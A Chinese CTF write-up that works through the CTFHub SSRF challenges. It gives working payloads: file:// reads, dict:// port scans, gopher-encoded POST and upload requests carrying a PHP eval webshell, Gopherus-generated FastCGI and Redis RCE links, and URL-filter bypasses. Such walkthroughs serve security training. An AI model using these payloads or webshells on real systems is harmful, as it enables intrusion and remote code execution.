WHCSRL 技术网

CTFHub-Web-SSRF练习

基础知识

内网访问

题目描述:尝试访问位于127.0.0.1的flag.php吧

访问靶机地址,发现url后面多了/?url=_
在这里插入图片描述
然后访问127.0.0.1/flag.php

Payload: ?url=127.0.0.1/flag.php
  • 1

伪协议读取文件

题目描述:尝试去读取一下Web目录下的flag.php吧

在这里插入图片描述

在SSRF中常用的伪协议是file:///协议,其在ssrf中可以用来读取php源码。

Payload: ?url=file:///var/www/html/flag.php
  • 1

然后查看源代码
在这里插入图片描述

端口扫描

题目描述:来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦,

在这里插入图片描述

使用SSRF中的dict协议可以用来探测开放的端口

Payload: ?url=dict://127.0.0.1:8000
  • 1

利用burpsuite对端口进行爆破
在这里插入图片描述
提示端口号在8000-9000
在这里插入图片描述

发现8566端口长度与其他端口不一样
在这里插入图片描述
然后访问8566端口

Payload: ?url=127.0.0.1:8566
  • 1

在这里插入图片描述

Gopher协议的利用

POST请求

题目描述:这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

根据提示抓包访问302.php,无服务
在这里插入图片描述

尝试访问flag.php
在这里插入图片描述
内网访问flag.php,发现了key=e42236c6f932a86af6eaa1f0ca77e0de

?url=127.0.0.1/flag.php
  • 1

在这里插入图片描述

需要我们用gopher协议去用post key到flag.php,不过需要注意的是要从127.0.0.1发送数据。使用方法:gopher://ip:port/_payload

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=e42236c6f932a86af6eaa1f0ca77e0de
#注意Content-Length那里,必须和你的POST请求长度一样
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

URL编码,进行url三次编码即(注:第一次url编码后要手动在所有%%%%0A前面加上%%%%0D,再进行后续编码)

POST%%%%2520/flag.php%%%%2520HTTP/1.1%%%%250D%%%%250AHost:%%%%2520127.0.0.1:80%%%%250D%%%%250AContent-Type:%%%%2520application/x-www-form-urlencoded%%%%250D%%%%250AContent-Length:%%%%252036%%%%250D%%%%250A%%%%250D%%%%250Akey=e42236c6f932a86af6eaa1f0ca77e0de
  • 1

构造Payload:

?url=gopher://127.0.0.1:80/_POST%%%%2520/flag.php%%%%2520HTTP/1.1%%%%250D%%%%250AHost:%%%%2520127.0.0.1:80%%%%250D%%%%250AContent-Type:%%%%2520application/x-www-form-urlencoded%%%%250D%%%%250AContent-Length:%%%%252036%%%%250D%%%%250A%%%%250D%%%%250Akey=e42236c6f932a86af6eaa1f0ca77e0de
  • 1

得到flag
在这里插入图片描述
利用gopher协议构造post请求脚本如下:

import urllib.parse
payload =
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=e42236c6f932a86af6eaa1f0ca77e0de
"""  
#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
new = tmp.replace('%%%%0A','%%%%0D%%%%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)       # 这里因为是GET请求所以要进行两次url编码
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15

得到

gopher%%%%3A//127.0.0.1%%%%3A80/_POST%%%%2520/flag.php%%%%2520HTTP/1.1%%%%250D%%%%250AHost%%%%253A%%%%2520127.0.0.1%%%%253A80%%%%250D%%%%250AContent-Type%%%%253A%%%%2520application/x-www-form-urlencoded%%%%250D%%%%250AContent-Length%%%%253A%%%%252036%%%%250D%%%%250A%%%%250D%%%%250Akey%%%%253De42236c6f932a86af6eaa1f0ca77e0de%%%%250D%%%%250A
  • 1

上传文件

参考文章:https://www.jianshu.com/p/a9e5a64b733b

题目描述:这次需要上传一个文件到flag.php了.祝你好运

访问靶机地址,一片空白,尝试访问flag.php,提示需要从本地访问
在这里插入图片描述
从目标机本地访问flag.php:

?url=127.0.0.1/flag.php
  • 1

得到文件上传的页面:
在这里插入图片描述

使用伪协议读取flag.php的源码

Payload: ?url=file:///var/www/html/flag.php
  • 1

flag.php

<?php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}

if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
    echo getenv("CTFHUB");
    exit;
}
?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14

发现会判断文件是否为空, 上传一个非空文件,没有提交选项,F12手动添加提交框:

<input type="submit" name="submit" >
  • 1

得到
在这里插入图片描述
上传文件,bp拦截
在这里插入图片描述
将Host的值改为127.0.0.1:80,然后将上面的包进行第一次url编码,然后把%%%%0A改成%%%%0D%%%%0A,然后再进行两次url编码。拿脚本梭

import urllib.parse
payload =
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------92335795416210780092655892737
Content-Length: 395
Origin: http://challenge-6af7ed5071d80457.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-6af7ed5071d80457.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php
Upgrade-Insecure-Requests: 1

-----------------------------92335795416210780092655892737
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php 
    @eval($_POST["pass"]);
?> 
-----------------------------92335795416210780092655892737
Content-Disposition: form-data; name="submit"

提交查询
-----------------------------92335795416210780092655892737--
"""#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
new = tmp.replace('%%%%0A','%%%%0D%%%%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)       # 这里因为是GET请求所以要进行两次url编码
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35

输出结果如下:

gopher%%%%3A//127.0.0.1%%%%3A80/_POST%%%%2520/flag.php%%%%2520HTTP/1.1%%%%250D%%%%250AHost%%%%253A%%%%2520challenge-973c40c4217366cd.sandbox.ctfhub.com%%%%253A10800%%%%250D%%%%250AUser-Agent%%%%253A%%%%2520Mozilla/5.0%%%%2520%%%%2528Windows%%%%2520NT%%%%252010.0%%%%253B%%%%2520Win64%%%%253B%%%%2520x64%%%%253B%%%%2520rv%%%%253A90.0%%%%2529%%%%2520Gecko/20100101%%%%2520Firefox/90.0%%%%250D%%%%250AAccept%%%%253A%%%%2520text/html%%%%252Capplication/xhtml%%%%252Bxml%%%%252Capplication/xml%%%%253Bq%%%%253D0.9%%%%252Cimage/webp%%%%252C%%%%252A/%%%%252A%%%%253Bq%%%%253D0.8%%%%250D%%%%250AAccept-Language%%%%253A%%%%2520zh-CN%%%%252Czh%%%%253Bq%%%%253D0.8%%%%252Czh-TW%%%%253Bq%%%%253D0.7%%%%252Czh-HK%%%%253Bq%%%%253D0.5%%%%252Cen-US%%%%253Bq%%%%253D0.3%%%%252Cen%%%%253Bq%%%%253D0.2%%%%250D%%%%250AAccept-Encoding%%%%253A%%%%2520gzip%%%%252C%%%%2520deflate%%%%250D%%%%250AContent-Type%%%%253A%%%%2520multipart/form-data%%%%253B%%%%2520boundary%%%%253D---------------------------340238428019634687501146349694%%%%250D%%%%250AContent-Length%%%%253A%%%%2520394%%%%250D%%%%250AOrigin%%%%253A%%%%2520http%%%%253A//challenge-973c40c4217366cd.sandbox.ctfhub.com%%%%253A10800%%%%250D%%%%250AConnection%%%%253A%%%%2520close%%%%250D%%%%250AReferer%%%%253A%%%%2520http%%%%253A//challenge-973c40c4217366cd.sandbox.ctfhub.com%%%%253A10800/%%%%253Furl%%%%253D127.0.0.1/flag.php%%%%250D%%%%250AUpgrade-Insecure-Requests%%%%253A%%%%25201%%%%250D%%%%250A%%%%250D%%%%250A-----------------------------340238428019634687501146349694%%%%250D%%%%250AContent-Disposition%%%%253A%%%%2520form-data%%%%253B%%%%2520name%%%%253D%%%%2522file%%%%2522%%%%253B%%%%2520filename%%%%253D%%%%25221.php%%%%2522%%%%250D%%%%250AContent-Type%%%%253A%%%%2520application/octet-stream%%%%250D%%%%250A%%%%250D%%%%250A%%%%253C%%%%253Fphp%%%%2520%%%%250D%%%%250A%%%%2520%%%%2520%%%%2520%%%%2520%%%%2540eval%%%%2528%%%%2524_POST%%%%255B%%%%2522pass%%%%2522%%%%255D%%%%2529%%%%253B%%%%250D%%%%250A%%%%253F%%%%253E%%%%2520%%%%250D%%%%250A-----------------------------340238428019634687501146349694%%%%250D%%%%250AContent-Disposition%%%%253A%%%%2520form-data%%%%253B%%%%2520name%%%%253D%%%%2522submit%%%%2522%%%%250D%%%%250A%%%%250D%%%%250A%%%%25C3%%%%25A6%%%%25C2%%%%258F%%%%25C2%%%%2590%%%%25C3%%%%25A4%%%%25C2%%%%25BA%%%%25C2%%%%25A4%%%%25C3%%%%25A6%%%%25C2%%%%259F%%%%25C2%%%%25A5%%%%25C3%%%%25A8%%%%25C2%%%%25AF%%%%25C2%%%%25A2%%%%250D%%%%250A-----------------------------340238428019634687501146349694--%%%%250D%%%%250A
  • 1

传参得到flag
在这里插入图片描述

FastCGI协议

题目描述:这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助

Gopherus工具:https://github.com/tarunkant/Gopherus.git
参考:https://blog.csdn.net/mysteryflower/article/details/94386461

如果端口9000是开放的,则SSRF漏洞可能存在并且可能导致RCE。为了利用它,您需要提供一个目标主机上必须存在的文件名(首选.php)。

?url=file:///var/www/html/index.php

?php
​
error_reporting(0);if (!isset($_REQUEST['url'])) {
header("Location: /?url=_");
exit;
}$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15

目标服务器上存在/var/www/html/index.php。

准备一句话木马:<?php @eval($_POST['x']);?>,保存在文件tmp.php中

构造要执行的终端命令:对一句话木马进行解码,并写入到名为shell.php的文件中。

echo “PD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8+Cg==” | base64 -d > shell.php

使用Gopherus工具生成payload

┌──(kali㉿kali)-[~/桌面/Python/SSRF/Gopherus]
└─$ python gopherus.py --exploit fastcgi                                                                                                           2________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/     ___ /  _ \____ |  |  _/ __ _  __   |  /  ___/
    _  (  <_> )  |_> >   Y    ___/|  | /  |  /___ 
 ______  /____/|   __/|___|  /___  >__|  |____//____  >
        /       |__|        /     /                 /

                author: $_SpyD3r_$

Give one file name which should be surely present in the server (prefer .php file)
if you don't know press ENTER we have default one:  /var/www/html/index.php
Terminal command to run:  echo "PD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8+Cg==" | base64 -d > shell.php

Your gopher link is ready to do SSRF: 

gopher://127.0.0.1:9000/_%%%%01%%%%01%%%%00%%%%01%%%%00%%%%08%%%%00%%%%00%%%%00%%%%01%%%%00%%%%00%%%%00%%%%00%%%%00%%%%00%%%%01%%%%04%%%%00%%%%01%%%%01%%%%05%%%%05%%%%00%%%%0F%%%%10SERVER_SOFTWAREgo%%%%20/%%%%20fcgiclient%%%%20%%%%0B%%%%09REMOTE_ADDR127.0.0.1%%%%0F%%%%08SERVER_PROTOCOLHTTP/1.1%%%%0E%%%%03CONTENT_LENGTH119%%%%0E%%%%04REQUEST_METHODPOST%%%%09KPHP_VALUEallow_url_include%%%%20%%%%3D%%%%20On%%%%0Adisable_functions%%%%20%%%%3D%%%%20%%%%0Aauto_prepend_file%%%%20%%%%3D%%%%20php%%%%3A//input%%%%0F%%%%17SCRIPT_FILENAME/var/www/html/index.php%%%%0D%%%%01DOCUMENT_ROOT/%%%%00%%%%00%%%%00%%%%00%%%%00%%%%01%%%%04%%%%00%%%%01%%%%00%%%%00%%%%00%%%%00%%%%01%%%%05%%%%00%%%%01%%%%00w%%%%04%%%%00%%%%3C%%%%3Fphp%%%%20system%%%%28%%%%27echo%%%%20%%%%22PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg%%%%3D%%%%3D%%%%22%%%%20%%%%7C%%%%20base64%%%%20-d%%%%20%%%%3E%%%%20shell.php%%%%27%%%%29%%%%3Bdie%%%%28%%%%27-----Made-by-SpyD3r-----%%%%0A%%%%27%%%%29%%%%3B%%%%3F%%%%3E%%%%00%%%%00%%%%00%%%%00

-----------Made-by-SpyD3r-----------
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22

url编码一下,url传参

?url=%%%%67%%%%6f%%%%70%%%%68%%%%65%%%%72%%%%3a%%%%2f%%%%2f%%%%31%%%%32%%%%37%%%%2e%%%%30%%%%2e%%%%30%%%%2e%%%%31%%%%3a%%%%39%%%%30%%%%30%%%%30%%%%2f%%%%5f%%%%25%%%%30%%%%31%%%%25%%%%30%%%%31%%%%25%%%%30%%%%30%%%%25%%%%30%%%%31%%%%25%%%%30%%%%30%%%%25%%%%30%%%%38%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%31%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%31%%%%25%%%%30%%%%34%%%%25%%%%30%%%%30%%%%25%%%%30%%%%31%%%%25%%%%30%%%%31%%%%25%%%%30%%%%35%%%%25%%%%30%%%%35%%%%25%%%%30%%%%30%%%%25%%%%30%%%%46%%%%25%%%%31%%%%30%%%%53%%%%45%%%%52%%%%56%%%%45%%%%52%%%%5f%%%%53%%%%4f%%%%46%%%%54%%%%57%%%%41%%%%52%%%%45%%%%67%%%%6f%%%%25%%%%32%%%%30%%%%2f%%%%25%%%%32%%%%30%%%%66%%%%63%%%%67%%%%69%%%%63%%%%6c%%%%69%%%%65%%%%6e%%%%74%%%%25%%%%32%%%%30%%%%25%%%%30%%%%42%%%%25%%%%30%%%%39%%%%52%%%%45%%%%4d%%%%4f%%%%54%%%%45%%%%5f%%%%41%%%%44%%%%44%%%%52%%%%31%%%%32%%%%37%%%%2e%%%%30%%%%2e%%%%30%%%%2e%%%%31%%%%25%%%%30%%%%46%%%%25%%%%30%%%%38%%%%53%%%%45%%%%52%%%%56%%%%45%%%%52%%%%5f%%%%50%%%%52%%%%4f%%%%54%%%%4f%%%%43%%%%4f%%%%4c%%%%48%%%%54%%%%54%%%%50%%%%2f%%%%31%%%%2e%%%%31%%%%25%%%%30%%%%45%%%%25%%%%30%%%%33%%%%43%%%%4f%%%%4e%%%%54%%%%45%%%%4e%%%%54%%%%5f%%%%4c%%%%45%%%%4e%%%%47%%%%54%%%%48%%%%31%%%%32%%%%33%%%%25%%%%30%%%%45%%%%25%%%%30%%%%34%%%%52%%%%45%%%%51%%%%55%%%%45%%%%53%%%%54%%%%5f%%%%4d%%%%45%%%%54%%%%48%%%%4f%%%%44%%%%50%%%%4f%%%%53%%%%54%%%%25%%%%30%%%%39%%%%4b%%%%50%%%%48%%%%50%%%%5f%%%%56%%%%41%%%%4c%%%%55%%%%45%%%%61%%%%6c%%%%6c%%%%6f%%%%77%%%%5f%%%%75%%%%72%%%%6c%%%%5f%%%%69%%%%6e%%%%63%%%%6c%%%%75%%%%64%%%%65%%%%25%%%%32%%%%30%%%%25%%%%33%%%%44%%%%25%%%%32%%%%30%%%%4f%%%%6e%%%%25%%%%30%%%%41%%%%64%%%%69%%%%73%%%%61%%%%62%%%%6c%%%%65%%%%5f%%%%66%%%%75%%%%6e%%%%63%%%%74%%%%69%%%%6f%%%%6e%%%%73%%%%25%%%%32%%%%30%%%%25%%%%33%%%%44%%%%25%%%%32%%%%30%%%%25%%%%30%%%%41%%%%61%%%%75%%%%74%%%%6f%%%%5f%%%%70%%%%72%%%%65%%%%70%%%%65%%%%6e%%%%64%%%%5f%%%%66%%%%69%%%%6c%%%%65%%%%25%%%%32%%%%30%%%%25%%%%33%%%%44%%%%25%%%%32%%%%30%%%%70%%%%68%%%%70%%%%25%%%%33%%%%41%%%%2f%%%%2f%%%%69%%%%6e%%%%70%%%%75%%%%74%%%%25%%%%30%%%%46%%%%25%%%%31%%%%37%%%%53%%%%43%%%%52%%%%49%%%%50%%%%54%%%%5f%%%%46%%%%49%%%%4c%%%%45%%%%4e%%%%41%%%%4d%%%%45%%%%2f%%%%76%%%%61%%%%72%%%%2f%%%%77%%%%77%%%%77%%%%2f%%%%68%%%%74%%%%6d%%%%6c%%%%2f%%%%69%%%%6e%%%%64%%%%65%%%%78%%%%2e%%%%70%%%%68%%%%70%%%%25%%%%30%%%%44%%%%25%%%%30%%%%31%%%%44%%%%4f%%%%43%%%%55%%%%4d%%%%45%%%%4e%%%%54%%%%5f%%%%52%%%%4f%%%%4f%%%%54%%%%2f%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%31%%%%25%%%%30%%%%34%%%%25%%%%30%%%%30%%%%25%%%%30%%%%31%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%31%%%%25%%%%30%%%%35%%%%25%%%%30%%%%30%%%%25%%%%30%%%%31%%%%25%%%%30%%%%30%%%%25%%%%37%%%%42%%%%25%%%%30%%%%34%%%%25%%%%30%%%%30%%%%25%%%%33%%%%43%%%%25%%%%33%%%%46%%%%70%%%%68%%%%70%%%%25%%%%32%%%%30%%%%73%%%%79%%%%73%%%%74%%%%65%%%%6d%%%%25%%%%32%%%%38%%%%25%%%%32%%%%37%%%%65%%%%63%%%%68%%%%6f%%%%25%%%%32%%%%30%%%%25%%%%32%%%%32%%%%50%%%%44%%%%39%%%%77%%%%61%%%%48%%%%41%%%%67%%%%51%%%%47%%%%56%%%%32%%%%59%%%%57%%%%77%%%%6f%%%%4a%%%%46%%%%39%%%%51%%%%54%%%%31%%%%4e%%%%55%%%%57%%%%79%%%%64%%%%34%%%%4a%%%%31%%%%30%%%%70%%%%4f%%%%7a%%%%38%%%%25%%%%32%%%%42%%%%43%%%%67%%%%25%%%%33%%%%44%%%%25%%%%33%%%%44%%%%25%%%%32%%%%32%%%%25%%%%32%%%%30%%%%25%%%%37%%%%43%%%%25%%%%32%%%%30%%%%62%%%%61%%%%73%%%%65%%%%36%%%%34%%%%25%%%%32%%%%30%%%%2d%%%%64%%%%25%%%%32%%%%30%%%%25%%%%33%%%%45%%%%25%%%%32%%%%30%%%%73%%%%68%%%%65%%%%6c%%%%6c%%%%2e%%%%70%%%%68%%%%70%%%%25%%%%32%%%%37%%%%25%%%%32%%%%39%%%%25%%%%33%%%%42%%%%64%%%%69%%%%65%%%%25%%%%32%%%%38%%%%25%%%%32%%%%37%%%%2d%%%%2d%%%%2d%%%%2d%%%%2d%%%%4d%%%%61%%%%64%%%%65%%%%2d%%%%62%%%%79%%%%2d%%%%53%%%%70%%%%79%%%%44%%%%33%%%%72%%%%2d%%%%2d%%%%2d%%%%2d%%%%2d%%%%25%%%%30%%%%41%%%%25%%%%32%%%%37%%%%25%%%%32%%%%39%%%%25%%%%33%%%%42%%%%25%%%%33%%%%46%%%%25%%%%33%%%%45%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30%%%%25%%%%30%%%%30
  • 1

shell.php已经被写入到服务器的/var/www/html目录下

/shell.php

x=system('cat /flag_bb4ae17f50829d327b60b4f752bc438d');

ctfhub{e028c80e91de1a8e7220d506}
  • 1
  • 2
  • 3
  • 4
  • 5

Redis协议

这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!

Redis系列漏洞总结:https://www.freebuf.com/articles/web/249238.html

主要利用redis未授权访问,如:写ssh-keygen公钥登录,利用计划任务反弹shell,直接写webshell等,主从复制getshell。

方法一:手打

首先用dict协议探测一下是否在6379端口:
url=dict://127.0.0.1:6379

看一下要不要认证:
url=dict://127.0.0.1:6379/info

发现存在,下一步设置本地存放dir:
url=dict://127.0.0.1:6379/config:set:dir:/var/www/html

然后开始写马,一般用十六进制
url=dict://127.0.0.1:6379/set:shell:"x3cx3fx70x68x70x20x40x65x76x61x6cx28x24x5fx50x4fx53x54x5bx61x5dx29x3bx3fx3e"
<?php @eval($_POST[a]);?>

url=dict://127.0.0.1:6379/set:shell:"x3cx3fx70x68x70x20x65x76x61x6cx28x24x5fx50x4fx53x54x5bx61x5dx29x3bx3fx3e"
<?php eval($_POST[a]);?>


设置文件名
url=dict://127.0.0.1:6379/set:dbfilename:atkx.php

最后保存
url=dict://127.0.0.1:6379/save
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22

这题好像行不通,一直复现不成功,而ctfshow web360两种方法都行

方法二:工具梭哈

┌──(kali㉿kali)-[~/桌面/Python/SSRF/Gopherus]
└─$ python gopherus.py --exploit redis


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/     ___ /  _ ____ |  |  _/ __ _  __   |  /  ___/
    _  (  <_> )  |_> >   Y    ___/|  | /  |  /___ 
 ______  /____/|   __/|___|  /___  >__|  |____//____  >
        /       |__|        /     /                 /

                author: $_SpyD3r_$


Ready To get SHELL

What do you want?? (ReverseShell/PHPShell): php

Give web root location of server (default is /var/www/html): 
Give PHP Payload (We have default PHP Shell): <?php eval($_POST[atkx]); ?>

Your gopher link is Ready to get PHP Shell: 

gopher://127.0.0.1:6379/_%%%%2A1%%%%0D%%%%0A%%%%248%%%%0D%%%%0Aflushall%%%%0D%%%%0A%%%%2A3%%%%0D%%%%0A%%%%243%%%%0D%%%%0Aset%%%%0D%%%%0A%%%%241%%%%0D%%%%0A1%%%%0D%%%%0A%%%%2432%%%%0D%%%%0A%%%%0A%%%%0A%%%%3C%%%%3Fphp%%%%20eval%%%%28%%%%24_POST%%%%5Batkx%%%%5D%%%%29%%%%3B%%%%20%%%%3F%%%%3E%%%%0A%%%%0A%%%%0D%%%%0A%%%%2A4%%%%0D%%%%0A%%%%246%%%%0D%%%%0Aconfig%%%%0D%%%%0A%%%%243%%%%0D%%%%0Aset%%%%0D%%%%0A%%%%243%%%%0D%%%%0Adir%%%%0D%%%%0A%%%%2413%%%%0D%%%%0A/var/www/html%%%%0D%%%%0A%%%%2A4%%%%0D%%%%0A%%%%246%%%%0D%%%%0Aconfig%%%%0D%%%%0A%%%%243%%%%0D%%%%0Aset%%%%0D%%%%0A%%%%2410%%%%0D%%%%0Adbfilename%%%%0D%%%%0A%%%%249%%%%0D%%%%0Ashell.php%%%%0D%%%%0A%%%%2A1%%%%0D%%%%0A%%%%244%%%%0D%%%%0Asave%%%%0D%%%%0A%%%%0A

When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. 

-----------Made-by-SpyD3r-----------
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28

再编码一下

?url=gopher://127.0.0.1:6379/_%%%%25%%%%32%%%%41%%%%31%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%38%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%66%%%%6c%%%%75%%%%73%%%%68%%%%61%%%%6c%%%%6c%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%41%%%%33%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%33%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%73%%%%65%%%%74%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%31%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%31%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%33%%%%32%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%30%%%%41%%%%25%%%%30%%%%41%%%%25%%%%33%%%%43%%%%25%%%%33%%%%46%%%%70%%%%68%%%%70%%%%25%%%%32%%%%30%%%%65%%%%76%%%%61%%%%6c%%%%25%%%%32%%%%38%%%%25%%%%32%%%%34%%%%5f%%%%50%%%%4f%%%%53%%%%54%%%%25%%%%35%%%%42%%%%61%%%%74%%%%6b%%%%78%%%%25%%%%35%%%%44%%%%25%%%%32%%%%39%%%%25%%%%33%%%%42%%%%25%%%%32%%%%30%%%%25%%%%33%%%%46%%%%25%%%%33%%%%45%%%%25%%%%30%%%%41%%%%25%%%%30%%%%41%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%41%%%%34%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%36%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%63%%%%6f%%%%6e%%%%66%%%%69%%%%67%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%33%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%73%%%%65%%%%74%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%33%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%64%%%%69%%%%72%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%31%%%%33%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%2f%%%%76%%%%61%%%%72%%%%2f%%%%77%%%%77%%%%77%%%%2f%%%%68%%%%74%%%%6d%%%%6c%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%41%%%%34%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%36%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%63%%%%6f%%%%6e%%%%66%%%%69%%%%67%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%33%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%73%%%%65%%%%74%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%31%%%%30%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%64%%%%62%%%%66%%%%69%%%%6c%%%%65%%%%6e%%%%61%%%%6d%%%%65%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%39%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%73%%%%68%%%%65%%%%6c%%%%6c%%%%2e%%%%70%%%%68%%%%70%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%41%%%%31%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%32%%%%34%%%%34%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%73%%%%61%%%%76%%%%65%%%%25%%%%30%%%%44%%%%25%%%%30%%%%41%%%%25%%%%30%%%%41
  • 1

连接🐎

/shell.php

atkx=system('cat /flag_56381dbdb8879c071fdbd8b47e044436');

ctfhub{3f364bbf61aa400455122885}
  • 1
  • 2
  • 3
  • 4
  • 5

Bypass

URL Bypass

请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧

方法:

1.利用?绕过限制url=https://www.baidu.com?www.xxxx.me
2.利用@绕过限制url=https://www.baidu.com@www.xxxx.me
3.利用斜杠反斜杠绕过限制
4.利用#绕过限制url=https://www.baidu.com#www.xxxx.me
5.利用子域名绕过
6.利用畸形url绕过
7.利用跳转ip绕过
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

题目要求url must startwith “http://notfound.ctfhub.com”
在这里插入图片描述
我们可以利用@来绕过,如 http://whoami@127.0.0.1实际上是以用户名 whoami 连接到站点127.0.0.1,即 http://notfound.ctfhub.com@127.0.0.1http://127.0.0.1请求是相同的,该请求得到的内容都是127.0.0.1的内容。

所以直接构造,成功得到flag。

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

ctfhub{b808a23b0267eb37a9cf2d47}
  • 1
  • 2
  • 3

数字IP Bypass

这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

?url=http://127.0.0.1/flag.php
在这里插入图片描述
127被ban了,利用进制绕过

